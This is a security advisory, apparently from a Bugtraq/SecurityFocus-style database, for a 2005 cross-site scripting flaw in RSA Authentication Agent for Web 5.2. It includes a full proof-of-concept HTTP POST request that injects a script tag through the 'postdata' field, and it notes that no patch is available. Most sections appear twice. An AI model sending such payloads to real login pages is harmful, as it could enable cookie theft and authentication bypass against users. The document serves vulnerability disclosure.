RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
BID:13168
Info
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
| Bugtraq ID: | 13168 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 2005 12:00AM |
| Updated: | Apr 14 2005 12:00AM |
| Credit: | Oliver Karow <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
Rsa RSA Authentication Agent for Web 5.2 |
| Not Vulnerable: | |
Discussion
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
A remote cross-site scripting vulnerability affects the RSA Security RSA Authentication Agent for Web. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks, due to the nature of the application, bypassing authentication requirements may be possible.
A remote cross-site scripting vulnerability affects the RSA Security RSA Authentication Agent for Web. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks, due to the nature of the application, bypassing authentication requirements may be possible.
Exploit / POC
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been made available:
POST /WebID/IISWebAgentIF.dll HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Cache-Control: no-cache
Referer: https://www.example.com/
Content-Length: 135
stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6
No exploit is required to leverage this issue. The following proof of concept has been made available:
POST /WebID/IISWebAgentIF.dll HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Cache-Control: no-cache
Referer: https://www.example.com/
Content-Length: 135
stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6
Solution / Fix
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
References:
References:
- RSA Authentication Agent 5.2 for Web Home Page (RSA Security)
- RSA Homepage (RSA Security)